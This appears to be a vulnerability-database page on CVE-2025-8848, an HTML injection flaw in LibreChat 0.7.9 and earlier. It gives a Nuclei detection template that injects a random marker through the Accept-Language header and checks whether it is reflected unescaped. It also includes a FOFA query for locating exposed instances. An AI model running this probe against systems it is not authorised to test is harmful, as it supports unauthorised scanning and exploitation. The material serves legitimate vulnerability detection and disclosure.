CVE-2025-8848: LibreChat <= 0.7.9 - HTML Injection via Accept-Language Header

2026-01-08 LibreChat PoC Public

Description

danny-avila/librechat 0.7.9 contains a stored XSS caused by improper sanitization of the Accept-Language header, letting logged-in users inject arbitrary HTML into the html lang= tag, exploit requires user to be logged in.

PoC

id: CVE-2025-8848

info:
  name: LibreChat <= 0.7.9 - HTML Injection via Accept-Language Header
  author: Kazgangap
  severity: medium
  description: |
    danny-avila/librechat 0.7.9 contains a stored XSS caused by improper sanitization of the Accept-Language header, letting logged-in users inject arbitrary HTML into the html lang= tag, exploit requires user to be logged in.
  impact: |
    Logged-in attackers can inject arbitrary HTML leading to cross-site scripting attacks, potentially compromising user sessions or data.
  remediation: |
    Update to the latest version where this issue is fixed.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8848
    - https://huntr.com/bounties/a05ebc1f-882a-4adc-b178-d3cefa4b730e
    - https://github.com/danny-avila/LibreChat
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2025-8848
    epss-score: 0.00417
    epss-percentile: 0.3543
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="LibreChat"
  tags: cve,cve2025,librechat,html-injection,vuln

variables:
  marker: "{{rand_base(20)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Accept-Language: "<h3>{{marker}}</h3>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<html lang="<h3>{{marker}}</h3>">'
          - 'LibreChat'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022034d28f73ac8dee701ed0f7d2eb8473d05d6c70c9be49c78c8a6359222f3b42d8022100dbb2555a12a7cd20d506daaaa7a27e40def0a717924e3126ee23ebd5aa48c24f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities